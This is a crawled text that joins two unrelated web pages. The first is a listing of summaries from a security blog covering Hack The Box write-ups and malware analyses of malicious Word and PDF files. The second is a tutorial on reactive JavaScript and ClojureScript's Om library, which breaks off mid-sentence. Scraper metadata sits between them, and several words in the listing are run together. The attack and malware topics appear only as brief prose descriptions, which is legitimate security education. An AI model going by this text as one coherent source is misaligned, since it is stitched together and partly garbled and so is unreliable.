Canape is one of my favorite boxes on HTB. There is a flask website with a pickle deserialization bug. I find that bug by taking advantage of an exposed git repo on the site. With a user shell, we can exploit CouchDB to gain admin access, where we get homer’s password. I went down several rabbit holes trying to get code execution through couchdb, succeeding with EMPD, succeeding with one config change as root for CVE-2018-8007, and failing with CVE-2017-12636. Finally, I’ll take advantage of our user having sudo rights to run pip, and first get a copy of the flag, and then take it all the way to root shell.
Malware Analysis: BMW_Of_Sterlin.docmalware vba doc powershell dosfuscation olevba
Someone on an InfoSec group I participate in asked for help looking at a potentially malicious word doc. I took a quick look, and when I sent back the command line that came out, he asked if I could share how I was able to de-obfuscate quickly. In writing it up for him, I figured it might help others as well, so I’ll post it here as an example.
Malware Analysis: YourExploit.pdfmalware pdf pdf-parser pdfid nanocore vbscript
Pretty simple PDF file was uploaded to VT today, and only 11 of our 59 vendors mark is as malicious, despite it’s being pretty tiny and clearly bad. The file makes no effort at showing any real cover, and could even be a test upload from the malicious actor. The file writes a vbs script which downloads the next stage, and then runs the script and then the resulting binary. The stage two is still up, so I got a copy, which I was able to identify as nanocore, and do some basic dynamic analysis of that as well.
HTB: Poisonhackthebox ctf htb-poison log-poisoning lfi webshell vnc oscp-like
Poison was one of the first boxes I attempted on HTB. The discovery of a relatively obvious local file include vulnerability drives us towards a web shell via log poisoning. From there, we can find a users password out in the clear, albeit lightly obfuscated, and use that to get ssh access. With our ssh access, we find VNC listening as root on localhost, and
HTB: Stratospherectf htb-stratosphere hackthebox python struts cve-2017-9805 cve-2017-5638 mkfifo-shell forward-shell
Stratosphere is a super fun box, with an Apache Struts vulnerability that we can exploit to get single command execution, but not a legit full shell. I’ll use the Ippsec mkfifo pipe method to write my own shell. Then there’s a python script that looks like it will give us the root flag if we only crack some hashes. However, we actually have to exploit the script, to get a root shell.
SecNotes now live on HackTheBoxctf htb-secnotes hackthebox windows
My first submission to HTB, SecNotes, went live today! I was aiming for an easy (20 pt) Windows box, but it released as a medium (30 pt) box. First blood for user just fell, 1 hour and 9 minutes in. Still waiting on root. I hope people enjoy, and if you do the box, please reach out to me on the forums or direct message and let me know what you thought of it, and how you solved it. I’d be very excited to hear if there were any unintended paths discovered.
HTB: Celestialhackthebox htb-celestial ctf nodejs deserialization htb-aragog pspy cron oswe-like
Celestial is a fairly easy box that gives us a chance to play with deserialization vulnerabilities in Node.js. Weather it’s in struts, or python’s pickle, or in Node.js, deserialization of user input is almost always a bad idea, and here’s we’ll show why. To escalate, we’ll take advantage of a cron running the user’s code as root.
Malware Analysis: dotanFile.docmalware
On first finding this sample, I was excited to think that I had found something interesting, rarely detected, and definitely malicious so close to when it was potentially used in a phishing attack. The more analysis I did, the more it became clear this was more likely a testing document, used by a security team evaluating their employees or an endpoint product. Still, it was an interesting sample to play with, and understand how it does interesting things like C2 protocol detection and Sandbox detection.
Malware Analysis: Penn National Health and Wellness Program 2018.docmalware doc vba msbuild csproj dns document-variables crypto c# oledump
This word document contains a short bit of VBA that’s obfuscated using Word document variables to store the strings that might be identified in email filters and by AV. This seems to be effective, given the VT dection ratio. In fact, I came across this sample in conversation with someone who worked for one of the few products that was catching this sample. The VBA drops a Visual Basic C# project file, and runs it with msbuild, which executes a compilation Task. This code uses DNS TXT records to decrypt a next stage payload. Unfortunately, since the DNS record is no longer present.
Malware Analysis: inovoice-019338.pdfmalware pdf pdfid pdf-parser powershell settingcontent-ms flawedammyy
This is a neat PDF sample that I saw mentioned on @c0d3inj3cT’s Twitter, and wanted to take a look for myself. As @c0d3inj3cT says, it is a PDF that drops a SettingsContent-ms file, which then uses PowerShell to download and execute the next stage. I had been on the lookout for PDFs that try to run code to play with, so this seemed like a good place to dive in.
HTB: Silohtb-silo hackthebox ctf oracle odat sqlplus nishang aspx webshell volatility passthehash rottenpotato potato oscp-like
Silo was the first time I’ve had the opportunity to play around with exploiting a Oracle database. After the struggle of getting the tools installed and learning the ins and outs of using them, we can take advantage of this database to upload a webshell to the box. Then with the webshell, we can get a powershell shell access as a low-priv user. To privesc, we’ll have to break out our memory forensics skillset to get a hash out of a memory dump, which then we can pass back in a pass the hash attack to get a system shell. That’s all if we decided not to take the shortcut and just use the Oracle database (running as system) to read both flag files.
Malware Analysis: mud.docdoc vba malware crypto phishing wmi
This phishing document was interesting for not only its lure / cover, but also for the way it used encryption to target users who had a domain with certain key words in it. While brute forcing the domains only results in some potentially financial key words, the stage 2 domain acts as a pivot to find an original phish email in VT, which shows this was quite targeted after all.
HTB: Valentinehackthebox htb-valentine ctf heartbleed tmux dirtycow oscp-like
Valentine was one of the first hosts I solved on hack the box. We’ll use heartbleed to get the password for an SSH key that we find through enumeration. There’s two paths to privesc, but I’m quite partial to using the root tmux session. The box is very much on the easier side for HTB.
SANS SEC599 Reviewtraining review purple-team
I had the chance to take SANS SEC599, “Defeating Advanced Adversaries - Purple Team Tactics & Kill Chain Defenses” last week at SANSFIRE. The class is one of the newer SANS offerings, and so I suspect it will be changing and updating rapidly. There are some things I would change about the class, but overall, I enjoyed the class, definitely learned things that I didn’t know before, and got to meet some really smart people.
HTB: Aragogctf htb-aragog hackthebox xxe ssh pspy wordpress cron
Aragog provided a chance to play with XML External Entity (XXE) vulnerabilities, as well as a chance to modify a running website to capture user credentials.
HTB: Barthackthebox htb-bart ctf nmap gobuster wfuzz cewl bruteforce log-poisoning php webshell nishang winlogon powershell-run-as oscp-plus
Bart starts simple enough, only listening on port 80. Yet it ends up providing a path to user shell that requires enumeration of two different sites, bypassing two logins, and then finding a file upload / LFI webshell. The privesc is relateively simple, yet I ran into an interesting issue that caused me to miss it at first. Overall, a fun box with lots to play with.
Second Order SQL-Injection on HTB Nightmarehackthebox htb-nightmare ctf sqli sqlmap tamper second-order-sqli second-order
Nightmare just retired, and it was a insanely difficult box. Rather than do a full walkthrough, I wanted to focus on a write-up of the second-order SQL injection necessary as a first step for this host.
Malware Analysis: Faktura_VAT_115590300178.jsmalware javascript procmon procdot process-hacker logging powershell
I spent some time looking at this javascript sample from VT. Based on both the file extension and the fact that I couldn’t get it to run in
spidermonkeyor
internet explorer, it seems likely that this was a
.jsfile.
HTB: Nibbleshackthebox htb-nibbles ctf meterpreter sudo cve-2015-6967 oscp-like
Nibbles is one of the easier boxes on HTB. It hosts a vulnerable instance of nibbleblog. There’s a Metasploit exploit for it, but it’s also easy to do without MSF, so I’ll show both. The privesc involves abusing
sudoon a file that is world-writable.
HTB: Falafelhackthebox htb-falafel ctf wfuzz sqlmap sqli type-juggling php upload webshell framebuffer /dev/fb0 debugfs oscp-plus oswe-like
Falafel is one of the best put together boxes on HTB. The author does a great job of creating a path with lots of technical challenges that are both not that hard and require a good deal of learning and understanding what’s going on. And there are hints distributed to us along the way.
HTB: Chatterboxhackthebox htb-chatterbox ctf msfvenom meterpreter achat autorunscript nishang oscp-like
Chatterbox is one of the easier rated boxes on HTB. Overall, this box was both easy and frustrating, as there was really only one exploit to get all the way to system, but yet there were many annoyances along the way. While I typically try to avoid Meterpreter, I’ll use it here because it’s an interesting chance to learn / play with the Metasploit AutoRunScript to migrate immediately after exploitation, so that I could maintain a stable shell.
Intro to SSH Tunnelinghackthebox ssh tunnel
I came across a situation on a htb box today where I needed IE to get a really slow, older, OWA page to fully function and do what I needed to do. I had a Windows vm around, but it was relatively isolated, and no able to talk directly to my kali vm. SSH tunneling turned out to be the easiest solution here, and since I get questions about SSH tunneling all the time, I figured it would be good to write up a short description.
PSDecode, follow-on analysis of Emotet samplesemotet malware doc powershell invoke-obfuscation psdecode
In my analysis of an emotet sample, I came across PSDecode, and, after some back and forth with the author and a couple updates, got it working on this sample. The tool is very cool. What follows is analysis of a different emotet phishing document similar to the other one I was looking at, as well as
PSDecodeoutput for the previous sample.
Malware: Facture-impayee-30-mai#0730-04071885.docmalware doc vba powershell emotet invoke-obfuscation
Interesting sample from VT which ends up being a phishing document for the Emotet malware.
HTB: CrimeStoppersctf hackthebox htb-crimestoppers php php-wrapper lfi ida reverse-engineering
This is one of my favorite boxes on HTB. It’s got a good flow, and I learned a bunch doing it. We got to tackle an LFI that allows us to get source for the site, and then we turn that LFI into RCE toget access. From there we get access to a Mozilla profile, which allows privesc to a user, and from there we find someone’s already left a modified rootme apache module in place. We can RE that mod to get root on the system.
HTB: FluxCapacitorctf hackthebox htb-fluxcapacitor waf wfuzz sudo
Probably my least favorite box on HTB, largely because it involved a lot of guessing. I did enjoy looking for privesc without having a shell on the host.
HTB: Bashedctf hackthebox htb-bashed php sudo cron oscp-like
Bashed retired from hackthebox.eu today. Here’s my notes transformed into a walkthrough. These notes are from a couple months ago, and they are a bit raw, but posting here anyway.
Home Lab On The Super Cheap - ESXimacpro home-lab esxi
Getting the hypervisor installed is the next step.
Home Lab On The Super Cheap - The Hardwareebay macpro home-lab
The benefits of a home lab are numerous to anyone into infosec, CTFs, and/or malware analysis. Here’s how I approached it on the cheap. | https://0xdf.gitlab.io/ | CC-MAIN-2022-40 | refinedweb | 52,313 | 56.89 |
In this tip, I demonstrate how you can retrieve a view from any folder in an ASP.NET MVC application. I show you how to use both specific paths and relative paths.
In this tip, I demonstrate how you can retrieve a view from any folder in an ASP.NET MVC application. I show you how to use both specific paths and relative paths.
Until today, I thought that a controller action could return a view from only one of two places:
· Views\controller name · Views\Shared
· Views\controller name
· Views\Shared
For example, if you are working with the ProductController, then I believed that you could only return a view from either the Views\Product folder or the Views\Shared folder. When looking through the source code for the ViewLocator class, I discovered that I was wrong. If you supply a “Specific Path” for a view, you can retrieve a view from any location in an ASP.NET MVC application.
The ProductController.Index() action in Listing 1 returns a view from the specific path ~\Confusing\ButWorks.aspx.
Listing 1 – ProductController.vb (VB.NET)
Public Class ProductController
Inherits Controller
Public Function Index() As ActionResult
Return View("~\Confusing\ButWorks.aspx")
End Function
End Class
Listing 1 – ProductController.cs (C#)
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;
namespace Tip24.Controllers
{
public class ProductController : Controller
{
public ActionResult Index()
{
return View( @"~\Confusing\ButWorks.aspx");
}
}
}
A specific path is a path that starts with either the character ~ or /. Any other path gets treated differently.
You also can use relative paths such as SubProduct\Details or SubProduct/Details. Either relative path will return a view located at Views\Product\SubProduct\Details.aspx. Listing 2 contains a complete code listing that illustrates using relative paths.
Listing 2 – ProductController.vb (VB.NET)
Return View("SubProduct\Details")
Listing 2 – ProductController.cs (C#)
return View(@"SubProduct\Details");.
Good tip. Agreed on the 'never break this rule' bit. Except I break it. My User, Products, etc controllers all, er, control their own Admin actions rather than making a different AdminUser, AdminProducts, etc controller, so I do sub-folder those views. So rather than having a index.aspx and an admin_index.aspx in the same folder. I have an index.aspx and an admin/index.aspx, and I use View("admin/index") in the admin_index() action. Breaking the rules? Sure, a little, but it's still crystal clear.
Hi,
yesterday I did a post on my Blog in german language to show how to implement a custom viewlocator which only defines another target folder for the views. In my example its '/MVC/Views'.
Maybe you want to complete your blog post by mentioning this approach.
Here is my blogpost:
blog.dotnet-expert.de/.../ImplementierenEinesEigenenViewLocatorsF%c3%bcrASPNetMVC.aspx
Greet,
Jens
Thanks for stressing the convention. I think it is really important have this been an extreme case for drifting from the convention.
I had to include 'Views' in the path to get this to work:
@"~\Views\Confusing\ButWorks.aspx"
I landed on this post because I'm trying to do what Jens is doing - it would be nice to have a configurable root directory, rather than assuming the root of the web site.
For example, I am trying to have the MVC run under an /admin/ directory, but nowhere else in the web site.
Jens' solution actually is pretty good! Thanks for the discussion!
Everyoneknowsthat,inanASP.NETMVCWebapplication,weshouldplaceallViewPagesandViewUserCo... | http://weblogs.asp.net/stephenwalther/archive/2008/07/23/asp-net-mvc-tip-24-retrieve-views-from-different-folders.aspx | crawl-002 | refinedweb | 574 | 52.66 |
Build a Mini Netflix with React in 10 Minutes
Developers are constantly faced with challenges of building complex products every single day. And there are constraints on the time needed to build out the features of these products..
MVP Challenge
An excited entrepreneur just approached you to build a video service. A service where users can quickly upload short videos and share on twitter for their friends to view. Let’s list out the features of this app.
Features
- Users should be able to sign up and log in.
- Registered/Logged-in users should be able to upload short videos of about 20 - 30 seconds.
- Registered/Non-registered users should be able to view all uploaded videos on the platform on a dashboard.
- Users should be able to share any of the videos on twitter.
Now, here’s the catch! T’challa of Wakanda wants to invest in some startups today, so the entrepreneur needs to demo the MVP of the video service in 10 minutes from now.
I know you are screaming your heart right now. It’s totally okay to cry and let the world know about your problems and challenges, but after much ado shedding tears, will the app be ready in 8 minutes? Well, sorry - tears can’t build an app!
Solution
It’s possible to build the MVP our entrepreneur is asking for. Let me show you how! Ready your editor, your command line and anxious fingers. Let’s get to work!!!
1) Flesh Out The App
We’ll use React to build out the app. Facebook has a tool, create-react-app that can scaffold a progressive web app out of the box in less than a minute. If you don’t have it installed, please install and run the command below in your terminal:
create-react-app miniflix cd miniflix
Go ahead and open up
public/index.html. Pull in bootstrap and add it just after the link to the favicon.
… <link href="" rel="stylesheet"> …
2. Set up Authentication & Views
Go ahead and install the following packages from your terminal:
npm install auth0-js react-router@3.0.0 jwt-decode axios
auth0-js - For authentication react-router - For routing within our app jwt-decode - For decoding the JSON Web Token in our app axios - For making network requests.
Open up your src directory and create a components and utils folder. In the utils folder, create a file, AuthService.js and add the code here to it. I explained how to handle the authentication in this tutorial, so check it out to ensure you are on the right track.
We’ll create 4 components in the components folder. Callback.js, Display.js, Nav.js and Upload.js
The Callback component basically stores our authentication credentials and redirects back to the upload route in our app.
The Display component will be dashboard for viewing all videos.
The Nav component will be the navigation that all pages in the app will share.
The Upload component will handle uploading of videos by registered users.
Add this piece of code below to components/Callback.js :
import { Component } from 'react'; import { setIdToken, setAccessToken } from '../utils/AuthService'; class Callback extends Component { componentDidMount() { setAccessToken(); setIdToken(); window.location.href = "/"; } render() { return null; } } export default Callback;
Add this piece of code to components/Nav.js :="/">Miniflix</Link> </div> <ul className="nav navbar-nav"> <li> <Link to="/">All Videos</Link> </li> <li> { ( isLoggedIn() ) ? <Link to="/upload">Upload Videos<;
In the Nav component, you must have observed that we imported a css file. Open the App.css file and add this code here to it.
Add this piece of code to components/Display.js:
import React, { Component } from 'react'; import { Link } from 'react-router'; import Nav from './Nav'; import { isLoggedIn } from '../utils/AuthService'; import axios from 'axios'; class Display extends Component { render() { return ( <div> <Nav /> <h3 className="text-center"> Latest Videos on Miniflix </h3> <hr/> <div className="col-sm-12"> </div> </div> ); } } export default Display;
Add this piece of code to components/Upload.js:
import React, { Component } from 'react'; import { Link } from 'react-router'; import Nav from './Nav'; class Upload extends Component { render() { return ( <div> <Nav /> <h3 className="text-center">Upload Your 20-second Video in a Jiffy</h3> <hr/> <div className="col-sm-12"> <div className="jumbotron text-center"> <button className="btn btn-lg btn-info"> Upload Video</button> </div> </div> </div> ); } } export default Upload;
Lastly, open up index.js and add replace it with the code here to set up your routes.
Now, when you run your app with
npm start, you should have views like this:
3. Upload Videos
We need a storage space for the videos our users will upload. Cloudinary is a cloud-based service that provides an end-to-end image and video management solution including uploads, storage, administration, manipulation and delivery. Head over to Cloudinary.com and create an account for free.
Let’s make use of Cloudinary’s Upload Widget. This widget allows you to upload videos or any type of file from your local computer, facebook, dropbox and Google Photos. Wow, very powerful. And the integration is seamless.
Go ahead and reference the cloudinary widget script in your index.html:
<script src="//widget.cloudinary.com/global/all.js" type="text/javascript"></script>
Note: You can add it just after the links.
Now in Upload.js, modify the code to look like this:
import React, { Component } from 'react'; import { Link } from 'react-router'; import Nav from './Nav'; class Upload extends Component { uploadWidget = () => { window.cloudinary.openUploadWidget( { cloud_name: cloud_name', upload_preset: 'unsigned-preset', tags: ['miniflix'], sources: ['local', 'url', 'google_photos', 'facebook', 'image_search'] }, function(error, result) { console.log("This is the result of the last upload", result); }); } render() { return ( <div> <Nav /> <h3 className="text-center">Upload Your 20-second Video in a Jiffy</h3> <hr/> <div className="col-sm-12"> <div className="jumbotron text-center"> <button onClick={this.uploadWidget} Upload Video</button> </div> </div> </div> ); } } export default Upload;
In the code above, we added a third argument, tags. Cloudinary provides this for automatic video tagging. Every video that is uploaded to this app will be automatically tagged, miniflix. In addition, you can provide as many tags as you want. This feature is very useful when you want to search for videos too!
In the uploadWidget function, we called the cloudinary.openUploadWidget function and attached it to the “Upload Video” button. When the user clicks the button, it opens the widget. Replace the cloud_name & upload_preset values with your credentials from Cloudinary dashboard.
Sign in to your app, head over to the upload videos route and try uploading a video.
Upload Widget
Uploading the video...
It uploads the video straight to Cloudinary and returns a response object about the recently uploaded video that contains so many parameters such as the unique publicid, secureurl, url, originalfilename, thumbnailurl, createdat, duration and so many others.
4. Display Videos
We need a dashboard to display all the videos uploaded for users to see at a glance. Here, we will make use of Cloudinary’s react component. Install it:
npm install cloudinary-react
Now, open up components/Display.js and modify the code to be this below:
import React, { Component } from 'react'; import { Link } from 'react-router'; import Nav from './Nav'; import { isLoggedIn } from '../utils/AuthService'; import { CloudinaryContext, Transformation, Video } from 'cloudinary-react'; import axios from 'axios'; class Display extends Component { state = { videos: [] }; getVideos() { axios.get('') .then(res => { console.log(res.data.resources); this.setState({ videos: res.data.resources}); }); } componentDidMount() { this.getVideos(); } render() { const { videos } = this.state; return ( <div> <Nav /> <h3 className="text-center"> Latest Videos on Miniflix </h3> <hr/> <div className="col-sm-12"> <CloudinaryContext cloudName="unicodeveloper"> { videos.map((data, index) => ( <div className="col-sm-4" key={index}> <div className="embed-responsive embed-responsive-4by3"> <Video publicId={data.public_id} width="300" height="300" controls></Video> </div> <div> Created at {data.created_at} </div> </div> )) } </CloudinaryContext> </div> </div> ); } } export default Display;
In the getVideos code above, we take advantage of a very slick Cloudinary trick that helps grab all videos with a particular tag, when using just one tag. Check it out again:
So we if had a tag like
vimeo, our url will end up with .../vimeo.json. So in the code below, we got all the videos and stored in the videos state.
axios.get('') .then(res => { console.log(res.data.resources); this.setState({ videos: res.data.resources}); });
The Cloudinary React SDK has 4 major components: Image, Video, Transformation and CloudinaryContext. We are interested in the Video and CloudinaryContext for now. Christian explained how these components work here.
In the render method, we simply just looped through the videos state and passed the public_id of each video into the Cloudinary Video component. The Video component does the job of resolving the public_id from Cloudinary, getting the video url, and displaying it using HTML5 video on the webpage. An added advantage is this: Cloudinary automatically determines the best video type for your browser. Furthermore, it allows the user have the best experience possible by choosing the best from the range of available video types and resolutions.
Run your app, and try to see the list of all videos. It should be similar to this:
You can also manipulate your videos on the fly, with the help of Cloudinary via the Transformation component.
5. Share on Twitter
Go ahead install the react twitter widget component:
npm install react-twitter-widgets
In the components/Display.js file, import the component at the top:
import { Share } from 'react-twitter-widgets' … …
Now, add this piece of code just after the div that shows the time the video was created.
… … <Share url={`{data.public_id}.mp4`} />
Check your app again. It should be similar to this:
Now, try to tweet.
Simple! It’s really not that hard. The source code for this tutorial is on GitHub.
Conclusion
Our MVP is ready. Our entrepreneur. Now sit back, relax and watch your account become flooded with investor money! Wait a minute, there is a 90% probability that you’ll called to add more features to this app. Well, I think Cloudinary can still help you with more features such as:
- Automatic Subtitles and translation
- Video briefs - short video, based on few gif images that will extract from the uploaded video.
- Automatic and/or manual video markers - marking specific locations in the video so the user can wait patiently to watch them, or jump directly to these points
- Find Similar videos by automatic video tagging
Cloudinary provides many options for uploading, transforming and optimizing your videos. Feel free to dive in and explore them.
This content is sponsored via Syndicate Ads | http://brianyang.com/build-a-mini-netflix-with-react-in-10-minutes/ | CC-MAIN-2017-47 | refinedweb | 1,764 | 57.67 |
Slashdot Log In
42 ways to Distribute DeCSS
Fabien Penso writes "As you know lots of homepages has been shut down or had troubles because they were distributing DeCSS source code (2600.com, ...). This one explains you other ways to share it. Basic FTP, HTTP, but also NetBIOS, ssh, DNS, IRC, Corba (!), XDMCP, CVS, etc. All the examples are also running on the server so you can get a try while you read it." Mirror early, mirror often ;)
This discussion has been archived. No new comments can be posted.
42 ways to Distribute DeCSS | Log In/Create an Account | Top | 124 comments (Spill at 50!) | Index Only | Search Discussion
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
My solution (Score:4)
This would mean that in order to see something that allegedly violates the MPAA's DMCA protections, you'd have to allegedly violate DigitalConvergence's DMCA protection.
Why not... (Score:3)
Oh, wait a minute....
J
it's not illegal... (Score:3)
The only related ruling is the one by Judge Kaplan, which states that it is not allowed in the State of New York to post a hyperlink that targets a copy of the DeCSS source code. Period.
This is not a wide ruling. It does not cover other methods of distribution. It does not cover distribution outside of New York. These things are not illegal, in New York or elsewhere.
Go forth, ye huddled, ye unwashed masses, and buy a DVD today with the express purpose of watching it on a Linux box using DeCSS!
My fantasy (Score:4)
Re:SDMI it! (Score:3)
in the kernel (Score:3)
Let's play Web that DeCSS! (Score:5)
Some notes: you're not allowed to type in anything! That is, you can't find a search engine and type in DeCSS. In my solution below, I need to go through the NY Times. Since I've registered with them, I don't have to type in anything, but if you haven't registered, it won't work. Maybe someone can find a solution that doesn't require registration?
Tattoo You (Score:3)
This would bring all kinds of interesting laws into effect. They can't issue cease and desist orders on someone's skin, nor could they reposses the code.
A "legal" way to distribute DeCSS? (Score:4)
Think it would work?
They missed a few (Score:5)
thank you very much
What you REALLY want to be mirroring.. (Score:4)
Never Not (Score:4)
On another note, I'd like to see this distributed carved into a pumpkin just in time for Autumn. God, the leaves looks beautiful
;)
----
How about this? (Score:4)
/* necessary headers for your system */
/* this should contain an array of char with the contents of decss.c (char *decss) and a constant (DECSS_LEN) stating the length of that array */
#include "decss_bytes.h"
#define ECHO_PORT 7
int main() {
int sockfd, clisock;
struct sockaddr_in server, client;
int addrlen;
char buffer[1024];
int bytes_recv;
int i, rawdata_point = 0;
if (( sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
exit(-1);
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons((u_short) ECHO_PORT);
if (bind(sockfd, (struct sockaddr *) &server, sizeof(server)))
exit(-1);
listen(sockfd, 5);
addrlen = sizeof(client);
clisock = accept(sockfd, (struct sockaddr *) &client, &addrlen);
do {
memset(buffer, '\0', 1024);
bytes_recv = recv(clisock, buffer, 1024, 0);
if (bytes_recv < 1) {
close(clifd);
exit(0);
}
if (bytes_recv > 0) {
for(i = 0; i < bytes_recv; i++)
if(rawdata_point < DECSS_LEN)
buffer[i] ^= decss[rawdata_point++];
send(clisock, buffer, bytes_recv, 0);
}
} while (1);
}
DISCLAIMER: Untested code based on a random
Is this going to end? (Score:3)
Look for it in Pi (Score:4)
Pi is infinitely long, the corresponding sequence must be in there somewhere.
Then just quote Pi starting at blah blah big
for decss.
DeCSS Distribution Through Microsoft Outlook Virus (Score:5)
I say someone writes an Outlook virus that would have compressed copies of the DeCSS source code attached to the message. Like most other Outlook viruses that run without the user knowing, this one would as well, execept it put the DeCSS souce code on a area of the hard drive where the user would normally not look and rename it (say C:\WINDOWS\SYSTEM\SKUZIDRV.SYS).
Later, if need be, the file could be retreived through another e-mail to the same person (assuming they keep the same computer) if we find the number of copies out there dwindling. Again, another Outlook virus that would create a new message, attach the file and send it to a specified address.
Hey, maybe I should patent this! Remote File Storage and Retrevial Using Microsoft Outlook.
SDMI it! (Score:4)
Support the EFF, and help DeCSS (Score:4)
DeCSS is just one of the things they're fighting for (or against). For more info, go to the EFF's web site [eff.org]. It's important that they're supported by the technical community as they fight the stupid but powerful actions of the MPAA and other big entities. I, personally, will be renewing my membership after a far-too-long lapse.
Haaz: Co-founder, LinuxPPC Inc., making Linux for PowerPC since 1996. | http://slashdot.org/articles/00/10/17/1422240.shtml | crawl-001 | refinedweb | 873 | 73.07 |
Here is my code, and it perform well in Sublime. I dont know why it will cause "Time Limit Exceeded" in Leetcode. Can anyone help me to figure out the problem? Thanks a lot!
def reverseList(self, head): if not head: return None pre = head curr = head.next while curr: temp = curr.next curr.next = pre pre = curr curr = temp return pre
That code doesn't get "Time Limit Exceeded". It gets "IndentationError".
But even after fixing that, it's clearly wrong, as you build an infinite list (because you never set
head.next to None, so the last element of the reversed list points to the second-to-last).
So it certainly doesn't "perform well in Sublime", as it produces a wrong result. Don't you check your results? | https://discuss.leetcode.com/topic/16322/why-my-python-code-will-cause-time-limit-exceeded | CC-MAIN-2018-05 | refinedweb | 131 | 78.25 |
This post looks at an algorithm by Cohen et al [1] to accelerate the convergence of an alternating series. This method is much more efficient than the classical Euler–Van Wijngaarden method.
For our example, we’ll look at the series
which converges slowly to -π²/12.
The first algorithm in [1] for approximating
using up to the nth term is given by the following Python code.
def cohen_sum(a, n): d = (3 + 8**0.5)**n d = (d + 1/d)/2 b = -1 c = -d s = 0 for k in range(n): c = b - c s += c*a[k] b = (k+n)*(k-n)*b/((k + 0.5)*(k+1)) return s/d
Two notes: First, the algorithm assumes the index of summation starts at zero and so we’ll shift our sum to start at zero. We could just define the first term of the sum to be zero and leave the rest of the series alone, but this would produce worse results; it leads to an initial jump in the series that makes the extrapolation in the method less effective. Second, the alternating term (-1)k is not part of the array passed into the function.
Two graphs, especially the second, will illustrate how well the method of Cohen et al performs compared to the direct method of simply taking partial sums. First, here are the sequence of approximations to the final sum on a linear scale.
And here are the errors in the two methods, plotted on a log scale.
The error from using the direct method of computing partial sums is on the order of 1/n² while the error from using the accelerated method is roughly 1/20.7n. In this example, it would take around 30,000 terms for the direct method to achieve the accuracy that the accelerated method achieves with 10 terms.
Note that accelerating convergence can be a delicate affair. Different acceleration methods are appropriate for different sums, and applying the wrong method to the wrong series can actually slow convergence as illustrated here.
More on series acceleration
[1] Henri Cohen, Fernando Rodriguez Villegas, and Don Zagier. Convergence Acceleration of Alternating Series. Experimental Mathematics 9:1, page 3
2 thoughts on “Accelerating an alternating series”
I was curious if there was a way to calculate d_n that makes it more obviously an integer. The d_n satisfy a three term recurrence: d_{n+1} = 6*d_n – d_{n-1}, with initial conditions d_1 = 1, d_2 = 3, so you can get the nth term from a matrix power:
[1 0] * [6 -1; 1 0]^n * [3; 1]
where the nth power of the matrix can be computed efficiently with the power-by-squaring algorithm. This parallels a similar strategy for computing Fibonacci numbers.
This is fantastic thanks!
I’ve been looking for comprehensible series acceleration techniques for a while, and other than Aitken this is the only one I’ve found that makes any sense to me.
Just dropped a PR to compute this; the performance is astonishing: | https://www.johndcook.com/blog/2020/08/06/cohen-acceleration/ | CC-MAIN-2021-31 | refinedweb | 506 | 60.14 |
A binary search or half-interval search algorithm finds the position of a specified value (the input "key") within a sorted
array. In each step, the algorithm compares the input key value with the key value of the middle element of the array. If the keys match,
then a matching element has been found so its index, or position, is returned. Otherwise, if the sought key is less than the middle element's
key, then the algorithm repeats its action on the sub-array to the left of the middle element or, if the input key is greater, on the
sub-array to the right. If the remaining array to be searched is reduced to zero, then the key cannot be found in the array and a special
"Not found" indication is returned.
Every)
package com.java2novice.algos;
public class MyBinarySearch {
public int binarySearch(int[] inputArr, int key) {
int start = 0;
int end = inputArr.length - 1;
while (start <= end) {
int mid = (start + end) / 2;
if (key == inputArr[mid]) {
return mid;
}
if (key < inputArr[mid]) {
end = mid - 1;
} else {
start = mid + 1;
}
}
return -1;
}
public static void main(String[] args) {
MyBinarySearch mbs = new MyBinarySearch();
int[] arr = {2, 4, 6, 8, 10, 12, 14, 16};
System.out.println("Key 14's position: "+mbs.binarySearch(arr, 14));
int[] arr1 = {6,34,78,123,432,900};
System.out.println("Key 432's position: "+mbs.binarySearch(arr1, 432));
}
}
Key 14's position: 6
Key 432's position:]. | http://java2novice.com/java-search-algorithms/binary-search/ | CC-MAIN-2019-35 | refinedweb | 242 | 53.51 |
S-exps in your browser
The front end of the pool
I've been interested in reactive JavaScript for a while. At memoways, we strive to build snappy user interfaces for clients who like to interact with their data with as little latency as possible.
In the past two years, I learned front-end development on-the-fly, as the needs of the clients required it. Two years ago, I was still using jQuery. Then, I discovered space-pen thanks to my colleague Nicolas. It was nice to have proper 'view' objects, and use jQuery's event system to have messages propagate throughout a hierarchy.
But state management was still an issue. Anything a tiny bit complex broke way too easily. Surely with a better code organization, I might've been able to hold on to space-pen longer (after all, it's used by Atom), but no matter how much effort you put into it, space-pen isn't really suited to rapid prototyping, something you need to do a lot of when you touch domains like dataviz.
Then I discovered Ractive.js, by the wonderful team at The Guardian. It seemed to me like a version of React without the baggage. Two-way binding is magical when it works: just store dynamic properties within the data object, use the getter/setter methods (or built-into-JS accessors if you're feeling adventurous and independent from all IE compatibility needs) and everything updates smoothly.
However, Ractive proved very hard to debug. Its custom sort-of-HTML parser (as is the tradition with almost all reactive frameworks nowadays) didn't give much context as to where errors were, when I last tried it. I had to quickly hack support for "printing surrounding code when a syntax error occurs" into my copy, just so my app wouldn't collapse.
Error reporting is often overlooked by new language implementors. "You should be writing correct code in the first place!", right? The truth is: good error reporting & debugging support is essential - when refactoring, tests are only useful to a degree. After that, you're left to the whims of whatever compiler, processor, macro expander you're using.
Enter ClojureScript
I had been hearing good stuff about Om for a while. I think it's one of the recent Prismatic blog posts that sold me on it. That was before I learned that they're pretty much the only high-profile company using ClojureScript in production!
But at this point, I was fed up with suddenly-breaking Ractive code, and anything new was good to distract me of my daily dev problems. Turns out, Om is probably awesome, but it's too verbose for me.
Here's how the start of Om's tutorial looks like:
clj
(om/root (fn [app owner] (reify om/IRender (render [_] (dom/h1 nil (:text app))))) app-state {:target (. js/document (getElementById "app"))})
Now, when you're discovering a new paradigm and a new language, that's a bit steep.
Let's walk through things step by step. First off, it's S-expressions all the way down. That means instead of writing:
JavaScript code
log("A completely unremarkable number: ", 40 + 2)
You'd write:
clj
(log "A completely unremarkable number: " (+ 40 2))
Yes, even
+ looks like a function call. It's handy, too, because you can
pass it any number of arguments, unlike the infix version:
clj
(log "Look, ma" (+ 1 2 3 4 5 6))
Same goes for
=, and lots of other primitives.
So, now we can see that we're calling something called
om/root. The slash
is Clojure's way of saying it likes to keep things nice and tidy, arranged into
namespaces. In this case, what they don't tell you is that on the top of this
